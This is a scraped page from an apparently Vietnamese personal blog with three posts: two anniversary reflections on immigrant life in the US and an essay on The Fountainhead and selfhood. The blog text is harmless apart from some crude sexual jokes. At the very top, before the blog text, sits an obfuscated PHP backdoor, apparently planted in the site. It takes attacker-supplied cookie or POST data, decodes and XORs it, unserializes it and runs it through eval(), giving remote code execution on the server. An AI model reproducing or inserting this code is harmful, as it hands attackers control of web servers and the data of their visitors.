$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> tôi – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: tôi

Hai năm ở xứ sở cờ hoa

Cuối tuần này về nhà, ngồi nói chuyện với ông Cậu khá thân, Cậu hỏi:
– Sao, hôm nay là tròn hai năm ngày ở đất Mỹ này, thấy thế nào?
Tôi im lặng, dù gần đây đã tự nhắc mình nhớ về ngày 03/07 này, nhưng khi nghe một người khác nói về nó, vẫn có cảm giác bồi hồi và lạ lẫm. Thời gian trôi qua nhanh quá…

Tôi không hẳn là có cái nhu cầu phải tổng kết mỗi năm, để xem mình đã làm được gì nơi xứ lạ quê người trong năm vừa qua. Chỉ là thật sự muốn viết gì đó, để lưu lại những năm tháng đáng nhớ trong một đời người mà thôi.

***

So với năm đầu qua đây đầy bỡ ngỡ, mọi thứ đều làm lại từ đầu, năm thứ hai ở nước Mỹ với gia đình tôi đã đi theo chiều hướng tốt hơn rất nhiều. Công việc của ba mẹ tuy có hơi vất vả, nhưng thu nhập ổn định, không lo nỗi lo bị cho nghỉ việc. Ba mẹ tôi cũng dần hòa nhập hơn (dù tiếng Anh hai người vẫn chưa khá lắm). Cuối tuần ba hay lái xe đưa mẹ đi chợ này chợ nọ để mua đồ. Xong sau đó mẹ về nấu ăn, ba thì lại lái xe đi vòng vòng xem ở đâu có garage sale không, hòng vác về nhà những đồ giá rẻ như cho. Cuộc sống với ba mẹ rất thanh bình. Có những buổi chiều, tôi lười nhác nằm trên nệm và nhìn ra ngoài vườn, thấy ba đang tưới nước cho cỏ và hàng cây một cách thật say mê. Nhà tôi có một mảnh vườn nho nhỏ, ba tuy sức khỏe không tốt nhưng cũng thường xuyên ra cắt cỏ, trồng cây, bón phân cho cây.

Đôi khi tôi nghĩ rằng, ba mẹ hòa nhập vào đời sống bên này nhanh hơn cả tôi. Điều đó làm tôi có cảm giác hơi buồn vì dường như ba mẹ đã dần quên đi Việt Nam. Tôi không trách ba mẹ tôi. Mỗi người có một suy nghĩ của riêng mình. Ba mẹ có lẽ vẫn còn yêu Việt Nam, nhưng bao nhiêu biến cố khiến cuộc đời ba mẹ hoàn toàn bị thay đổi, đã làm hai người cảm thấy rằng mình không thuộc về Việt-Nam-hiện-tại nữa. Một thời tuổi trẻ với bao mộng ước tương lai đã bị đánh mất. Cứ mỗi lần nghĩ về điều đó, nghĩ buồn cho ba mẹ vì sinh nhầm thời, tôi càng cảm thấy yêu họ hơn.

***

Những tháng gần đây, tôi nói chuyện với em gái tôi nhiều hơn. Khi ở gần nó, tôi chưa từng thật sự quan tâm nó theo đúng nghĩa một người anh. Đi xa rồi, mới thấy dù thế nào, tôi vẫn luôn muốn có cảm giác chở che, bao bọc, hướng dẫn cho nó. Tôi hồi đó xem phim hay thấy cảnh anh chị em trong cùng một nhà đấu đá, ghen tị nhau khi lớn lên đụng phải cơm, áo, gạo, tiền. Tôi và em gái tôi sẽ không bao giờ như vậy. Có lẽ, ngoài mẹ tôi ra, nó là người mà tôi yêu thương và quan tâm nhất.

Tôi qua đây khi đã học xong đại học, phải lao đầu vào công việc để kiếm tiền trang trải cuộc sống. Lương ba mẹ đi làm chỉ đủ nuôi em gái tôi ăn học, tôi không thể bỏ việc mà về nhà ăn bám bố mẹ. Đôi lần, khi lái xe một cách vô định cùng em gái giữa trời đêm thăm thẳm, tôi khuyên nó chọn một ngành nào đó thật tốt, vì nó có thời gian, nó có thể bỏ 5, 7 năm ra học ngành nào có tương lai. “Đừng chọn mấy nghề giống anh, làm không đủ ăn, lo nghĩ từng ngày.” Khi tôi nói ra câu này, tôi chỉ mong nó sau này sẽ sống sung sướng, không phải lo phải nghĩ quá nhiều về cuộc sống. Tôi không có cảm giác ghen tị vì em gái tôi có điều kiện theo đuổi những ngành nghề sau này sẽ giúp nó sống giàu có, vui sướng hơn tôi. Thậm chí, nếu sau này vì lí do gì đó tôi có điều kiện hơn, tôi cũng sẽ không ngần ngại lo cho nó về tất cả mọi chuyện.

Năm qua, một trong những điều khiến tôi vui nhất ấy là tôi càng ngày càng thân thiết với em gái tôi hơn, càng ngày càng thấy yêu thương và muốn bao bọc nó hơn. Có lẽ đến cuối đời.

***

Còn bản thân tôi, nếu nhìn vào những gì đã đạt được thì không có bước tiến nổi bật như năm đầu tiên. Tôi vẫn làm công việc với mức lương vừa đủ sống, được một lần tăng lương. Tuy hiện tại việc không nhiều lắm, nhưng khá là căng thẳng vì tuyệt đối không thể để sai sót xảy ra. Chỉ cần sai lầm khi gán một biến, gọi một hàm thôi… là đi nguyên hệ thống, thiệt hại có khi vài chục ngàn USD/ ngày.

Năm rồi, tôi cũng bắt đầu đi học Cao Học. Thật ra, tôi không thấy tấm bằng master ấy giúp ích cho tôi được gì trong công việc hiện tại. Những thứ học ở trường vẫn luôn là những thứ nặng lý thuyết, dù bên Việt Nam hay ở đây cũng vậy. Lý do duy nhất khiến tôi bằng mọi giá lấy được tấm bằng master ấy là vì tôi nghĩ, trong tương lai, nếu tôi cần tìm một công việc khác với mức lương cao hơn, thì nó sẽ rất có ích.

Hai năm trước khi mới bước chân tới Mỹ, tôi nghe nhiều người nói rằng cuộc sống bên này rất khó khăn, kinh tế suy thoái, con đường vào cao học cũng gian nan với bài thi GRE khó nhằn. Giờ đây nhìn lại, tôi tạm hài lòng với những gì mình làm được, khi vừa có việc làm gọi là khá, vừa được học tiếp cao học.

Tôi chưa hoàn toàn thuộc về nước Mỹ. Tôi – từ trong thâm tâm, vẫn trọn vẹn là một người Việt như trước đó đã từng. Tuy nhiên, trong lòng nước Mỹ này, giờ đây tôi đã thôi lạc lõng. Điều đó xuất phát từ việc tôi ý thức được rằng: chỉ cần cố gắng là được. Tôi không tự cao, những gì tôi làm được tới giờ chả được tính gì là nhiều nhặn, nhưng ít ra, tôi cũng bắt kịp đà tiến của các thanh niên bản xứ khác: có việc làm khi ra trường, hay học được tiếp lên cao học. Ngộ ra như thế mang lại cho tôi sự tự tin. Tôi khi muốn có thể hòa vào với người Mỹ. Tôi hoàn toàn thấy vui như là một phần của họ khi đội bóng của thành phố thắng giải này, giải kia… Khi đi offline một trong những forum lớn nhất bên này, tôi cũng cầm chai beer và xâu thịt nướng thoải mái trò chuyện, bông đùa.

Thế đấy, nếu phải tóm gọn về những gì mình đã làm được trong năm vừa qua, tôi nghĩ tôi chỉ dùng ba từ: sự tự tin. Tự tin rằng mình hoàn toàn không thua kém ai. Tự tin để sống, để làm việc, để học, và nghĩ về gia đình riêng của mình. Sớm thôi…

030711
B.l.u.e
.

Một năm ở xứ sở cờ hoa

Đường lối và cương lĩnh cách mạng của các cụ Mác Lênin có chửi bọn tư bản giãy chết đến đâu đi nữa thì cũng khó có thể khiến người ta phủ nhận một điều: những xứ sở nơi trời tây là thứ ánh sáng chói rực rỡ, hay như một cái hồ không đáy luôn cuốn hút ước mơ, mong mỏi của bao triệu con người ở khắp nơi trên thế giới.

Đối với Mỹ – kẻ không phải cầm đầu nhưng lại là tên sừng sỏ nhất, thì điều đó lại càng đúng. Người ta hay nói về giấc mơ Mỹ. Người ta biện hộ cho việc mình muốn đặt chân tới đây bằng nhiều mĩ từ khác nhau (vì vốn trên đời có kẻ nào vui khi bị gán ghép là sính ngoại, chạy theo thứ hào nhoáng, phù hoa… đâu chứ?).

I dreamed a dream – một năm như bóng câu qua cửa sổ, giấc mơ Mỹ của riêng tôi vẫn đang tiếp tục – giấc mơ không hoàn toàn chỉ có hình dáng của bà bụt, ông tiên… mà còn có những tháng ngày buồn bã, thất vọng…

***

Tôi đặt chân đến Mỹ với không một cái gì trong tay – ngoài bằng cử nhân (chưa kịp lấy) ở Việt Nam – mà ai cũng bảo là sẽ chẳng được công nhận. Houston chào đón tôi bằng một bầu trời xám ngắt, bằng cơn mưa không nặng hạt nhưng đọng lại thành những vệt dài trên cửa kính xe như đang khóc theo điệu bài hát Thành phố buồn mà radio đài người Việt đang phát.

Khi đặt chân xuống sân bay, hành lý của tất cả mọi người đều đi qua, chỉ hàng hóa của chúng tôi bị giữ lại. Những cái áo, đôi giày… vừa mua ở Việt Nam, bị hải quan sân bay – một lão già Trung Quốc cau có, khó chịu – qui cho là đem sang Mỹ buôn bán mà không khai, để trốn thuế. Bằng thứ tiếng Anh lõm bõm của mình, tôi bảo tay đó:
– Cái áo này có tầm 8$, anh nghĩ chúng tôi bán lại được bao nhiêu?
Bao nhiêu hải quan sân bay quanh đó đều đồng ý, chỉ có lão già đó trả lời:
– Tao không tin được bọn người Việt Nam.

Ôi thương thay cho cái suy nghĩ đầy thiên kiến của một người đầu đã được hai thứ tóc. Tôi định nói lại tiếp thì lão ấy nói:
– Đây là Mỹ. Chịu thì vào, còn không thì quay lại.
Thế là chúng tôi phải để hành lý lại, cứ chui tọt vào nước Mỹ đã rồi tính gì tính. (Tất nhiên là sau này, khi sân bay thuê người kiểm định giá trị tài sản, chúng tôi lấy lại mớ hành lý đó không một chút khó khăn gì). Đấy, cái giấc mơ Mỹ của tôi bắt đầu bằng một hành động đầy phân biệt – dân – tộc như thế (dù ông ta cũng chỉ là người Châu Á – da vàng, mũi tẹt như tôi, hay ông nghĩ đất nước ông đứng ở vị trí cao hẳn hơn?)

***

Nhắc lại, tôi qua đây khi vừa tốt nghiệp đại học được một tháng, với tấm bằng nhờ bạn bè hết lòng kéo lên, được đúng 7.000000001. Thật may mắn.
Tôi qua đây đúng lúc kinh tế Mỹ đang tụt dốc không phanh – mà tôi dám chắc là chỉ thua cái tốc độ tôi cởi đồ con gái thôi. Các cậu dì của tôi lớn lên ở đây, tốt nghiệp đại học bên này, làm việc đã bao nhiêu năm, nhưng người thì thất nghiệp, người thì lo ngay ngáy sắp bị mất việc.

Thế là tôi đi xin một chân chạy bàn, và ôn thi GRE để gắng thi vào cao học.

GRE là một bài thi rất chó chết, ngay cả dân bản xứ còn thấy khó nhằn (đâu như nếu học ở trung tâm ngốn hơn 2000 Mỹ kim), huống hồ là một người đến từ đất nước mà tiếng Anh không phải tiếng mẹ đẻ như tôi.

Tôi làm phục vụ bàn ở một nhà hàng Việt Nam, công việc cũng không có gì nặng nhọc, nhưng cũng chỉ làm được có tầm một tháng là nghỉ, lí do nhà hàng ế quá, dạo này kinh tế xuống, dân Việt mình tiết kiệm toàn mang theo đồ ăn đi làm, ít hẳn người buổi trưa ra ngoài ăn.

Thế là tôi lại chỉ ở nhà học ôn thi GRE. Mà cái sự học đó cũng chắn ngắt, ngồi cả ngày ở thư viện, gắng nhét vào đầu hơn 70 từ tiếng Anh (mà toàn lạ hoắc lạ hươ)/ ngày, trong khi xung quanh toàn các bé gái teen cười cười nói nói bàn về anh người sói, anh ma cà rồng, chị gái ngu ngốc…

Cứ ở nhà chỉ đi đi lại lại học học hành hành (và chả biết khi nào mới xong), cái chán nhất không phải là cái nhìn của mọi người. Đôi khi có những người bà con xa – mà nếu không qua đây thì tôi thề là tôi sẽ chẳng bao giờ biết, nhìn tôi với ánh mắt giả vờ như quan tâm: ôi, đâu có ai bên đây ngồi không thế cháu, cháu phải kiếm việc gì làm chứ… Cô/ chú/ bác sống bên này lâu rồi nên biết. Bằng đại học ở Việt Nam ai công nhận đâu mà cháu đòi học cao học. Tôi thì ngoài gái nói anh làm tình với em nhé tôi còn quan tâm, còn lại xem như cỏ rác, à mà đổ rác cũng tốn tiền, thôi xem như gió thổi vậy. Do thế, cái tôi thấy chán nhất là chính bản thân tôi. Cứ ngồi không thế, nhìn ba mẹ và em gái cực khổ đi làm, đôi khi cũng tệ lắm.

***

Tôi cũng thử gửi đơn xin vào vài chỗ làm về công nghệ thông tin. Nhưng như đã nói, chẳng việc gì trong cả chục lá đơn apply, người ta chú ý tới một thằng học đại học mà chả ai biết là đại học gì, gọi điện thoại thì nói chữ được chữ không. Thế là nộp cho có thôi, tôi cũng chả hi vọng nhiều.

Rồi tôi nhận được email từ một công ty ở Dallas, với link bài test kiến thức chuyên môn. Tôi hoàn thành chẳng khó khăn gì (trời ơi, tôi đạt điểm cao nhất luôn cơ đấy). Thế là công ty đó mua vé máy bay cho tôi tới phỏng vấn. Sau đó là thuê khách sạn cho tôi ở 3 tuần trong thời gian thử việc.

Quá trình thử việc diễn ra thật may mắn. Tôi nhận được offer chính thức. Ngày đó tôi mừng ơi là mừng. Chẳng có bà bụt, ông tiên nào hóa đũa thần vào giấc mơ, chỉ có những đêm thức trắng, ngồi code đến mỏi nhừ cả tay, đau cả mắt mà thôi…

Cùng thời điểm này, ba mẹ tôi cũng có việc làm (cũng gọi là khá đối với những người mới qua), em tôi xin được vào học college. Thật may…

***

Một năm chỉ hơn 1000 từ tóm tắt, nói ít không phải ít, nói nhiều cũng đủ là khá nhiều. Cái giấc mơ Mỹ của riêng tôi vẫn chưa thể dừng, tôi sẽ vẫn còn phải mơ tiếp và bước tiếp.

***

Giấc mơ Mỹ của tôi, không có bóng em…

030710
B.l.u.e


.

Suối Nguồn – vị nhân sinh – và những trải nghiệm gần đây

Ego

Tôi đọc những trang đầu tiên của Suối Nguồn ((http://www.tuoitre.com.vn/Tianyon/Index.aspx?ArticleID=235004&ChannelID=172)) khi đang ngồi chờ cho hết tám tiếng quá cảnh tại một sân bay nào đó ở Tokyo. Cuốn Suối Nguồn này là do một người bạn mà tôi cho là đặc biệt với tôi tặng. Tôi ngấu nghiến cuốn sách ở một góc nhìn ra ngoài thấy hàng loạt máy bay to đùng, giữa những bước chân nhộn nhịp đi qua đi lại, xì xồ thứ ngôn ngữ mà tôi không thể hiểu tại sân bay Nhật Bản; hay vừa đọc vừa lim dim chập chờn nhìn ra cửa sổ máy bay, đọc giữa một bên là ánh sáng mờ mờ trong khoang, một bên là vẻ xanh tươi của đại dương phía dưới và mây trời phía trên; hoặc giả là vào những buổi chiều nắng nhẹ, ngồi trên xích đu trong vườn, vừa đung đưa theo gió, vừa nhấm nháp từng trang sách.

Nói từng câu, từng chữ thì hơi quá, nhưng quả thật, từng tình huống trong Suối Nguồn đều có một phần tác động không nhỏ đến nhận thức và suy nghĩ của tôi. Tôi biết rằng cái tư tưởng chủ đạo của tác giả là những gì mà từ lâu tôi – tuy mơ hồ, nhưng luôn hướng tới; tuy thế, tôi vẫn loay hoay trong cái mớ bòng bong ấy, phần hiểu, phần mù mờ, cho tới khi tôi trải qua vài sự kiện trực tiếp có liên quan.

Cũng nói thêm một chút, tư tưởng của Ayn Rand trong Suối Nguồn được khắc hoạ qua hình ảnh của nhân vật chính, dài tới gần 1200 trang, còn của tôi chỉ đơn giản trong câu: sống cho khoảng khắc hiện tại.

Tôi vốn định mượn lời của Howard Roak – nhân vật chính trong tiểu thuyết để mô tả ý mình, nhưng phút cuối nghĩ lại, tôi chọn cách diễn giải ý kiến và cảm nhận của tôi. Có lẽ điều này sẽ tốt hơn.

Trên đời này, có hai thứ nhân danh ghê tởm nhất, theo tôi, đó là nhân danh số đông và nhân danh điều tốt lành. Tiếc là, ngày càng có nhiều người đủ thông minh để áp dụng những thứ này trong các cuộc tranh luận hòng tạo thêm trọng lượng cho biện hộ của mình.
Có sự liên hệ khá mật thiết giữa cái “tôi” vị kỷ và việc nhân danh. Thực ra, những người đứng lên để hô hào, dùng những lý lẽ “nhân danh”, lại là những người có cái tôi lớn nhất. Khi cái tôi của họ lớn quá mức kiểm soát, đến mức họ sợ sệt chính con quái vật do họ tạo ra, thì họ sẽ “nhân danh” để tìm được lý do biện hộ cho chính mình.
Không phải số đông nào cũng đúng, và cũng không phải điều tốt lành nào cũng là tốt lành cho tất cả. Hai điều này cực kì đơn giản và dễ nhận ra. Nhưng để vận dụng cái “nhân danh” tốt đẹp nhất, người ta đành bỏ qua nó.

Con người thường rất ngại khi phải thừa nhận rằng mình là người ích kỷ. Nhưng quả thật, sâu trong bản thân mỗi người đều là cái tôi to đùng. Tôi có thể hiểu khi nghe câu: Tôi rất quan tâm tới anh x, chị y, cô z… nhưng lại không đồng tình với câu: tôi sống vì… Con người không thể sống vì người khác, trong cả cuộc sống lẫn trong tình yêu. Khi con người đủ nhận thức, thì việc đầu tiên họ cần làm, và người khác nên để yên cho họ làm, đó là cho họ quyền sống vì chính mình, miễn là nó không vượt đi quá mức giới hạn nào đó – theo hệ quy chiếu của gia đình, xã hội, hay luật pháp.
Khi bạn không thể yêu bản thân bạn hơn hết thảy, thì đừng nói tới việc yêu người khác.

Vị nhân sinh là tốt, nhưng trong chừng mực nào đó. Vị nhân sinh theo nghĩa tuyệt đối, lại là một cách nghĩ có phần giả tạo.

Mỗi người đều có một cái tôi. Không ai được quyền lấy đi cái tôi, hay giết chết cái tôi của người khác. Con người phải sống vì cái tôi của mình, phải tự nuôi nấng nó. Một người mà mất đi cái tôi, điều đó là thảm hoạ. Chính vì thế, việc làm ngu ngốc nhất là hướng người khác theo những gì mình muốn, khi người đấy đã đủ nhận thức, đủ trưởng thành. Lúc này, khi cái tôi của người đó đang rất mỏng manh yếu ớt, chưa kịp phát triển mạnh mẽ, đã bị bóp nghẹt, bị giới hạn. Kết quả có thể là người đó có một cuộc sống tốt lành, nhưng rất nhạt, khi cái tôi – cái cơ bản kết cấu lên chính mình đã tan biến.

Điều bi kịch là, xã hội này về cơ bản được tạo thành từ những giá trị truyền thống, nơi mà một người nhân danh, một người đẩy cái “vị nhân sinh” (theo lời người ấy nói) lên cao nhất, lại tạo được sự đồng cảm hơn những người sống vì chính mình (vốn bị đánh đồng với sự ích kỷ).

Vấn đề tiếp theo, là đi mãi theo niềm tin của mình.

Ai cũng biết, cách giết đi một người, chính là giết chết niềm tin của anh ta.

Ngay từ nhỏ, tôi luôn nghĩ mình bằng mọi giá phải sống theo những gì mình cho là đúng. Nhưng tôi thất bại.

Khi mà lẽ ra tôi phải đứng lên và chống lại cái “nhân danh” ấy, thì tôi lại để nó tác động đến tôi, dẫn tôi đi chệch với cái lí tưởng sống mà tôi đã đề ra. Tôi có thể biện hộ cho mình bằng mọi lý lẽ: vì cái “nhân danh” ấy quá to lớn, quá tốt đẹp, quá cần thiết, nhưng trong bản chất, tôi vẫn thấy coi thường chính tôi. Vào thời điểm cần thiết nhất để khẳng định cái tôi của chính mình, thì tôi buông xuôi. Tôi vẫn chưa đủ dũng cảm để nói thẳng ra là: tôi khinh bỉ và ghê sợ cái “nhân danh” của bạn.

Khi mọi việc đã xảy ra, người ta sẽ có 2 cách chọn: một là tiếp tục buông xuôi, hai là tự cải tạo chính mình để đi theo đúng cái ý nghĩa cuộc sống mà mình đã đề ra. Để không bị trượt dài, tôi sẽ chọn cách thứ hai. Tuy nhiên, đó lại là câu chuyện khác…

B.l.u.e
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.